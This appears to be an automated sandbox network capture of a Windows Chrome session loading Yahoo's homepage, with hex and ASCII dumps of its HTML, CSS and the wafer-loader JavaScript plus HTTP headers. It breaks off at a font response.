                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC1300INData Raw: 6c 2c 20 57 65 61 74 68 65 72 2c 20 53 65 61 72 63 68 2c 20 50 6f 6c 69 74 69 63 73 2c 20 4e 65 77 73 2c 20 46 69 6e 61 6e 63 65 2c 20 53 70 6f 72 74 73 20 26 20 56 69 64 65 6f 73 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6e 66 3a 63 6a 73 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 55 53 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6f 61 74 68 3a 67 75 63 65 3a 63 6f 6e 73 65 6e 74 2d 68 6f 73 74 22 20 63 6f 6e 74 65 6e 74 3d 22 67 75 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 6d 61 6e 69 66 65 73 74 5f 64 65 73 6b 74 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: l, Weather, Search, Politics, News, Finance, Sports & Videos"><meta name="conf:cjs:locale" content="en-US"><meta name="oath:guce:consent-host" content="guce.yahoo.com"><meta property="og:type" content="website"><link rel="manifest" href="/manifest_desktop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC484INData Raw: 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 70 61 6e 6f 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 73 2d 75 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 72 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 72 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rel="alternate" href="https://www.yahoo.com" hreflang="en-us"><link rel="alternate" href="https://espanol.yahoo.com" hreflang="es-us"><link rel="alternate" href="https://fr.yahoo.com" hreflang="fr-fr"><link rel="alternate" href="https://br.yahoo.com" href
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC6INData Raw: 37 66 66 39 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 7ff9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC1300INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 32 34 62 34 32 35 62 38 38 36 64 33 30 36 39 61 35 34 35 30 37 32 36 38 31 31 62 66 65 34 63 61 38 31 63 65 36 31 65 35 33 63 37 35 36 32 34 64 37 63 61 31 39 62 62 61 32 35 37 34 63 31 38 34 22 3e 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 61 61 71 2f 73 63 70 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 41 74 6f 6d 69 63 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 66 64 37 35 61 33 65 37 61 38 36 64 35 35 31 30 38 30 35 35 35 66 38 34 62 34 32 64 31 63 34 30 2e 63 73 73 20 2a 2f 20 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 66 73 5c 29 7b 61 6c 69 67 6e 2d 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <style type="text/css" nonce="24b425b886d3069a5450726811bfe4ca81ce61e53c75624d7ca19bba2574c184">/* https://s.yimg.com/aaq/scp/css/commonAtomic.atomic.ltr.fd75a3e7a86d551080555f84b42d1c40.css */ #atomic .Ai\(c\){align-items:center}#atomic .Ai\(fs\){align-i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC1300INData Raw: 72 3a 76 61 72 28 2d 2d 62 6c 75 72 70 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 62 63 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 73 5c 28 68 5c 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 68 69 64 64 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 42 64 73 5c 28 73 5c 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 73 5c 28 73 5c 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r:var(--blurple)}#atomic .Bdendc\(--hulk-pants\){border-right-color:var(--hulk-pants)}#atomic .Bdbc\(--dirty-seagull\){border-bottom-color:var(--dirty-seagull)}#atomic .Bds\(h\){border-style:hidden}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    37192.168.2.44979687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC540OUTGET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC774INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 3RYrYqedLHzxY6yGpxZotQmHFGXt73f4GxlO7EM+2+bZtgj+pzHzUeJxpQT5/MGsR2+wzd3Alvd4M4eL/HLpp+4w7rCxIlihJXJCKm4Cwow=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: M69N8FY0V2R30YR0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 14:38:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "59ae89307f6be51355e07acf3994f79b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: ODQdcT.d6AiA15hD8NatovEvfsHYFam9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 9754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 5d 3d 65 28 29 3a 28 61 2e 77 61 66 65 72 3d 61 2e 77 61 66 65 72 7c 7c 7b 7d 2c 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 33 31 2e 38 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :"/aaq/wf/wf-action-1.8.1.js",raw:"/aaq/wf/wf-action-1.8.1.raw.js"}},"wafer-autocomplete":{meta:{version:"1.31.8"},modern:{min:"/aaq/wf/wf-autocomplete-1.31.8-modern.js",raw:"/aaq/wf/wf-autocomplete-1.31.8-modern.raw.js"},default:{min:"/aaq/wf/wf-autocomp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 63 6f 72 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 36 35 2e 31 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: js"},default:{min:"/aaq/wf/wf-clipboard-copy-1.0.2.js",raw:"/aaq/wf/wf-clipboard-copy-1.0.2.raw.js"}},"wafer-core":{meta:{version:"1.65.1"},modern:{min:"/aaq/wf/wf-core-1.65.1-modern.js",raw:"/aaq/wf/wf-core-1.65.1-modern.raw.js"},default:{min:"/aaq/wf/wf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 2d 31 2e 32 2e 31 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: modern.raw.js"},default:{min:"/aaq/wf/wf-dropdown-drawer-1.1.3.js",raw:"/aaq/wf/wf-dropdown-drawer-1.1.3.raw.js"}},"wafer-experiment-scrollview":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-experiment-scrollview-1.2.10-modern.js",raw:"/aaq/wf/wf-exper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 31 30 2e 36 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {version:"1.4.0"},modern:{min:"/aaq/wf/wf-image-1.4.0-modern.js",raw:"/aaq/wf/wf-image-1.4.0-modern.raw.js"},default:{min:"/aaq/wf/wf-image-1.4.0.js",raw:"/aaq/wf/wf-image-1.4.0.raw.js"}},"wafer-lightbox":{meta:{version:"1.10.6"},modern:{min:"/aaq/wf/wf-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 70 72 6f 67 72 65 73 73 2d 6c 6f 61 64 65 72 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n:{min:"/aaq/wf/wf-native-da-1.0.5-modern.js",raw:"/aaq/wf/wf-native-da-1.0.5-modern.raw.js"},default:{min:"/aaq/wf/wf-native-da-1.0.5.js",raw:"/aaq/wf/wf-native-da-1.0.5.raw.js"}},"wafer-progress-loader":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 2e 31 32 2e 36 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 33 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 78 74 22 3a 7b 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .12.6.raw.js"}},"wafer-template":{meta:{version:"1.4.3"},modern:{min:"/aaq/wf/wf-template-1.4.3-modern.js",raw:"/aaq/wf/wf-template-1.4.3-modern.raw.js"},default:{min:"/aaq/wf/wf-template-1.4.3.js",raw:"/aaq/wf/wf-template-1.4.3.raw.js"}},"wafer-text":{me
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 6f 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 33 2e 32 2e 32 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 7d 7d 2c 22 2e 2f 73 72 63 2f 65 6e 74 72 79 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o":{meta:{version:"3.2.2"},modern:{min:"/aaq/wf/wf-video-3.2.2-modern.js",raw:"/aaq/wf/wf-video-3.2.2-modern.raw.js"},default:{min:"/aaq/wf/wf-video-3.2.2.js",raw:"/aaq/wf/wf-video-3.2.2.raw.js"}}}},"./src/entry.js":function(a,e,r){"use strict";function w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 65 72 6e 3a 21 30 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 7d 2c 72 6f 6f 74 3a 73 7d 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 30 29 7d 29 2c 74 68 69 73 2e 73 79 6e 63 28 29 7d 72 65 74 75 72 6e 20 66 28 61 2c 5b 7b 6b 65 79 3a 22 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 5b 5d 3b 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 77 29 7b 76 61 72 20 66 3d 6c 5b 77 5d 7c 7c 77 2c 6f 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ern:!0,successClass:i},root:s},window.wafer.ready(function(){setTimeout(function(){e.loadWafersForWrapperElem(document)},0)}),this.sync()}return f(a,[{key:"loadWafersForWrapperElem",value:function(a){var e=this,r=[];j.forEach(function(w){var f=l[w]||w,o=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC201INData Raw: 65 74 28 6c 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6f 28 29 3b 65 5b 72 5d 3d 21 30 2c 6e 2e 5f 61 73 73 65 74 4c 6f 61 64 65 64 4d 61 70 70 69 6e 67 2e 73 65 74 28 6c 2c 21 30 29 2c 69 28 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 22 2b 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 65 5b 72 5d 3d 21 31 2c 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 73 28 61 29 3b 6f 28 29 7d 29 7d 29 7d 29 29 7d 7d 5d 29 2c 61 7d 28 29 2c 70 3d 71 3b 65 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 70 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: et(l))return void o();e[r]=!0,n._assetLoadedMapping.set(l,!0),i({src:"https://s.yimg.com"+l},function(a){if(e[r]=!1,a)return void s(a);o()})})}))}}]),a}(),p=q;e.default=new p({selector:".wafer"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    38192.168.2.44979587.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC574OUTGET /cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC640INHTTP/1.1 200 OK
